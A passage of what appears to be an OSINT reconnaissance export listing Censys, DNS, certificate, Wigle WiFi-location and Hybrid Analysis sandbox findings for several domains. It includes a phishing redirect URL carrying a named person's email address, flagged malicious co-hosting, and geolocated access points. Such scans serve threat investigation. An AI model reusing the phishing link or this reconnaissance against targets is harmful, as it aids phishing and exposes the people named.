N/A]\n "KFOlCnqEu92Fr1MmYUtfBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. 
All Rights Reserved.Roboto BlackRegularVersion 2.137; 2017Roboto-Bla"- [targetUID: N/A]\n "~DF4104C3A156FD39C8.TMP" has type "data"- Location: [%TEMP%\\~DF4104C3A156FD39C8.TMP]- [targetUID: 00000000-00003756]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "~DFB793AC7F13A190A4.TMP" has type "data"- Location: [%TEMP%\\~DFB793AC7F13A190A4.TMP]- [targetUID: 00000000-00003756]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003756]\n "~DFC3A186B09A1D8AC1.TMP" has type "data"- Location: [%TEMP%\\~DFC3A186B09A1D8AC1.TMP]- [targetUID: 00000000-00003756]\n "~DFA5A15892CE259FFA.TMP" has type "data"- Location: [%TEMP%\\~DFA5A15892CE259FFA.TMP]- [targetUID: 00000000-00003756]\n "~DFFFDE3D6507148FFE.TMP" has type "data"- Location: [%TEMP%\\~DFFFDE3D6507148FFE.TMP]- [targetUID: 00000000-00003756]\n "microsoft_PNG7_1_.png" has type "PNG image data 2096 x 771 8-bit colormap non-interlaced"- [targetUID: N/A]\n "_5F23AB45-DA89-11ED-AE70-080027198B7C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39', u'name': u'Drops XML files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 8, u'description': u'"www.google_1_.xml" has type "ASCII text with no line terminators"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', 
u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://llink.to/?u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fcopernicus.es%2Fdaniel.gomez%40copernicus.es"\n Pattern match: "https://llink.to"\n Pattern match: "https://www.gstatic.com/recaptcha/releases/6MY32oPwFCn9SUKWt8czDsDw/recaptcha__en.js"\n Pattern match: "https://www.google.com/recaptcha/api2/\';(cfg[\'render\']=cfg[\'render\']||[]).push(\'onload\');w[\'__google_recaptcha_client\']=true;var"\n Pattern match: "MUID0E9D24B2F451684D29613641F5D56964msn.com/1025288302553631105309164827182731026838*"\n Pattern match: "fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxP.ttf"\n Pattern match: "fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc9.ttf"\n Pattern match: "fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc9.ttf"\n Pattern match: "https://www.gstatic.com/recaptcha/releases/6MY32oPwFCn9SUKWt8czDsDw/styles__ltr.css"\n Pattern match: "https://www.google.com/recaptcha/api2/"\n Pattern match: "https://api.salesflare.com/,a=new"\n Pattern match: "SUIDMmicrosoft.com/9216274053632031026955164499057731026838*MUID02215E7CD9936B0700024C8FD8DF6A54microsoft.com/1025287302553631105309164499057731026838*SRCHDAF=NOFORMmicr | 185.199.111.153 |
| 2023-05-12 02:54:13 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3030::/48 | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CORGI-2 (Net ID: 00:14:6C:7C:72:22) | 32.8608, -79.9746 |
| 2023-05-12 03:41:52 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["315"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Microsoft-HTTPAPI/2.0"], "Connection": ["close"], "Content_Type": ["text/html; charset=us-ascii"], "Date": ["<REDACTED>"]} | 45.131.109.53 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Guernsey | ply.gg |
| 2023-05-12 03:33:53 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | http://ns.adobe.com/xap/1.0/ XPhotoshop 3.0 Photo Booth ICC_PROFILE mntrRGB XYZ acspAPPL | https://funny.battleb0t.xyz/images/jcqn.jpg |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Bug and issue tracking software | cdn-185-199-111-153.github.com |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 2 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 104.21.6.166 |
| 2023-05-12 02:56:58 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:97:99:5c:60:ac:40:68:f8:b2:de:0a:67:7a:da:b7:d1:16
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:02:53 2023 GMT
Not After : May 25 03:02:52 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:85:82:A3:5E:ED:4D:54:E9:0D:BD:02:AC:67:B2:FA:F3:E1:58:3F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:44:15 | Web Technology | No | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Express | nwapi2.battleb0t.xyz |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007-liang.github.io]
https://www.openphish.com/feed.txt | 007-liang.github.io |
| 2023-05-12 02:55:02 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://pwn.college/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFDE0.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFE20.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "8.252.188.126:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_804_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2052"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_804_IESQMMUTEX_0_331"\n 
"IsoScope_804_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_804_IE_EarlyTabStart_0xf78_Mutex"\n "IsoScope_804_ConnHashTable<2052>_HashTable_Mutex"\n "IsoScope_804_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFE1F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabFDDF.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003336]\n "~DFE21E09FE22C2FEB2.TMP" has type "data"- Location: 
[%TEMP%\\~DFE21E09FE22C2FEB2.TMP]- [targetUID: 00000000-00002052]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DFD99A0B0D863F67D1.TMP" has type "data"- Location: [%TEMP%\\~DFD99A0B0D863F67D1.TMP]- [targetUID: 00000000-00002052]\n "LHCS4QQD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LHCS4QQD.txt]- [targetUID: 00000000-00003336]\n "_1B7C6C58-B789-11ED-93A4-080027456658_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "O72WPLVL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\O72WPLVL.txt]- [targetUID: 00000000-00002052]\n "favicon_6_.png" has type "PNG image data 32 x 32 8-bit colormap non-interlaced"- [targetUID: N/A]\n "RecoveryStore._1000B8DF-B789-11ED-93A4-080027456658_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF127C77FF0F1B432F.TMP" has type "data"- Location: [%TEMP%\\~DF127C77FF0F1B432F.TMP]- [targetUID: 00000000-00002052]\n "TarFDE0.tmp" has type "data"- Location: [%TEMP%\\TarFDE0.tmp]- [targetUID: 00000000-00003336]\n "CabFE1F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabFE1F.tmp]- [targetUID: 00000000-00003336]\n "JSJJ6FDH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JSJJ6FDH.txt]- [targetUID: 00000000-00002052]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "bullet_1_.png" has type "PNG image data 24 x 10 16-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "NPYG33H2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NPYG33H2.txt]- [targetUID: 
00000000-00003336]\n "VGWV1EI4.htm" has type "HTML document UTF-8 Unicode text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\VGWV1EI4.htm]- [targetUID: 00000000-00003336]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: pwn.college\nDNT: 1\nConnection: Keep-Alive"\n "ZrHl\\e+8Lny)lO\n"!IpRU[uItHN2[SEqtg{/>ITng1LRDNoGIYC[W^/"*/QbM+ekZer/B2HR/UyTD)X5?n97#z:?9y~<9>>~r\\=?<Ox\\>]CC(7\\q//?_\\zg{x:TM(BG\'\'b8qJ]j^\'J#u>L<j*WVt[b\\QXS([nfqs^zD^O\n?xrEI+%mN+%2Z>^$skV|=[ik?H;nzQ1f4.KeO#ipWe\'_SV/""I4OV6rQ292vMb-mf`@\nN}v_tpp~L_XD"cP_?sYcp&e%\nxjBk<tuNF1@6_D:>gx1I{cS~fk<\\~+?PqJ\nfAkU)e*VVJYrfr hta%6*mf\n\n.7*01Vx7s1EFTX2sHF%cR.fxy+bvtgi4ftV@\\vx%D"34cK `b5Z:Y%Iu)Gf(G\n`0mb2KV:,mg\nE<76W)@fRr)/JqaKq[B&.+(mJQ5?~\'5 v (8zhJs\n|(s3xG#a|1vUp,rpHyQ?AD^66C~obc*8\n\nE4seT<C&J:%:04h ]5B\'$^\'fj@tOd"6GC/sNYD\nl2rx}X-1ITlWJ;", "iLHE`*43\n&^$7b2i\n^_Cx(E F2EN,#?v7+wWSq5{w3m- NP_V3E11nS>>yVXS^]f`/T8n/`Tyl`f>.?rrt9}j5\\z}>~Q\\?/IN qVyZf-tYLegc"?6dM-\n$7@\nh2%kPm\nq4 5!,{z1%1(!.)j b`\np*##kL;ZD\nuvtK%IXKv|]#EKZVKw7CtK7Jcm<a")d&g#Z)xFGKcr=F^Mhs\nY@H9%cL\\Ys2[Q*t&]^tqu5x{sj2;;\'3jSn,J)/Z!DcP\nP[NF>fHXyIZCov(`@di\nk{\'\nUSW31N(38?Mv QboR#p|>1dP#l21bD.T #)uO =I 
BI7u.n`I9B6KWV+[OOM$DDP&tqxkGz4F+P2yjy`>9<.2Qd,4Lg-J>H<Qk7p-^l!fUd%\nXtby}QY{U(B,x\n+BZ\nNO%Ei7$\\+Jr:~f2&XzaF;rVV$`8$p<&HOrj.Pb\n/V;UCk\nD#o\n}9l2AM% `z VOa A1*)^6~7T/Cwk/ydSPHUIzY>y,sYZa( &ayX-1\n\'/wUr741c3f|k<D"\n "r`f5xJ+*4@icNg0V}b8\nB{J;e0Xvr`7"ywUA$?L*34r)?kXMD|\',"Da=bbXTG=x ^~xtV<1o,5|(u[Aw~IJ!.T.?[0IDY0~ng+m*GYz+v)iy0m(4%{hS/J!#J*8K\\[wk:-Q7S}v59\n~A0**ns\'ru~k@C)R)AAECg74~1m>Cb[Fxbo^Y"CwpgC\\lX%feH18 ,Z^.L87[RTzq-:=E-#k04"}}^^683Uzx73Ri|[.gfr6}rNO&jR5hulGjYhW64{c1~A A\n^P`P6 @OG;wdQV3Z0.yf!uw[\nTRb?Dp=F4\nNzBY*}j>h\\}UL20"(I7{IGx^0ta!)\n@9%O|grXu6drvt!)9v)|W0^*)h=|!e9w.//?lv\'pQ!YIgw/hcuHQ2(K*~4sEmn<1#L*<<M#>0%6wm&@MI:w.YW-]7.],d,^)E5y`>sVl[oNAp9![*/GTa<\'9leK1w@=->~Q05V8hv(xh@u_VOk6\'d\n2~rvH5}\n p;,Qj!zY U9Ra" V}ach\')&\'!Gm:", "mID#29Q\nLDlMUUw{W_[nH\nTO\nh7f*Ad4u|PV)Ko`n`rTtRBi$@FgarOu^)H~2\n\n%CnjT$UkEdTHQ}AS& IuwAnm}*-A=B?>9y%-\n3\\o|7at{B&N)Q%f|O(V\\m%|Oe[J1O<"G]bhw?-b*SMe*DIS_J2MU\\RYIIa JgI84,5=kM~\nI_~|-_Eo}dj?"}TL!)\\<2L6ccuZlL|>1eq=/I8_]u*.", "GET /assets/css/style.css?v=f0893638821a8444049e923a1938a171949f6fa9 HTTP/1.1\nAccept: text/css\n */*\nReferer: https://pwn.college/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip\n deflate\nHost: pwn.college\nDNT: 1\nConnection: Keep-Alive", "W[6~5!dySZl\n8AM="bxh+\\k8HH\\c/R@"\n4N;" u}#R;w50A`-IWr|Z% t :S C3i_}2\\:1si:|mk&$ReV4Vf\\@\\{#!SHMCd$NefD0{2kMf4q(LinJMB�},$g?(%KtJ\n{#tEcN=A9C1g*+)*D bPBR1YsvQPrJ*QL\'Vfz/,<cvr!!V7%*sF9O[u&slke}irZa A)=C}ws={:F\\(e;R"t[12:I{cn:>z\'=xQl}}\n,#YYIwz[+&H9Ra2:Q[Q1IQNQEpcA0Ey\';$R0"0IWX\nbSdT"j7k9p"9Q6s[HU)cv"d7B_[y@/@6*Nec`\\(_L6tGN2[)o{J\ny.*JHU\nsY6-\n#p5eoF$RQ*s6W!.G9WYN3lG\n]Kv)}}h{J[b[;i$sjP/jTHrV=fcc2tm4Muo6*Pm(M_bYnY9|7n/u?/i#9:wZU<K^Z;hux~}Zg?dLity"<ohfJk8;6FoDY\'AuT+"hU7Lb.8&Yp=L}uP"tc;7mLWol:??%n?1hG\'l5jTf\\pNeHn)a/23pg[\'?Q:tGZTrE+-T_C", "i", "GET /assets/images/bkg.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: 
https://pwn.college/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: pwn.college\nDNT: 1\nConnection: Keep-Alive", "GET /assets/images/bullet.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://pwn.college/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: pwn.college\nDNT: 1\nConnection: Keep-Aliv | 185.199.109.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:02:DD:85:3E:34) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:46:49 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | 35.229.48.116 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:80 | 104.21.6.166 |
| 2023-05-12 03:09:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 114.48.229.35.bc.googleusercontent.com | 35.229.48.114 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f605fb97f4259-EWR | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:20 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:20 GMT", "cf-ray": "7c5f605fb97f4259-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 02:57:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'35.229.48.116'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://kamekititamiko.com/favicon/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar38D6.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3964.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00003656) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3552 -s 132" (UID: 00000000-00003656)'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': 
None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "DBWinMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f1c_IESQMMUTEX_0_519"\n "IsoScope_f1c_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f1c_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3868"\n "IsoScope_f1c_IE_EarlyTabStart_0xfe8_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_f1c_ConnHashTable<3868>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3868"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3552 -s 132" (UID: 00000000-00003656)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, 
u'type': 7, u'description': u'"35.229.48.116:443"\n "52.155.62.95:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab38F6.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab38D5.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"~DFD25448FC7F6A6276.TMP" has type "data"- Location: [%TEMP%\\~DFD25448FC7F6A6276.TMP]- [targetUID: 00000000-00003868]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003576]\n "Cab38F6.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab38F6.tmp]- [targetUID: 00000000-00003576]\n "725C371ABA02CD431C8DE4D18E4AA0CE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\725C371ABA02CD431C8DE4D18E4AA0CE]- [targetUID: 00000000-00003576]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003868]\n "~DF6FA7BF0440BF9C6E.TMP" has type "data"- Location: 
[%TEMP%\\~DF6FA7BF0440BF9C6E.TMP]- [targetUID: 00000000-00003868]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003868]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003868]\n "~DFC9E478F3FDB996C2.TMP" has type "data"- Location: [%TEMP%\\~DFC9E478F3FDB996C2.TMP]- [targetUID: 00000000-00003868]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003868]\n "NIC6QOUG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NIC6QOUG.txt]- [targetUID: 00000000-00003868]\n "Cab38D5.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab38D5.tmp]- [targetUID: 00000000-00003576]\n "Tar38D6.tmp" has type "data"- Location: [%TEMP%\\Tar38D6.tmp]- [targetUID: 00000000-00003576]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: 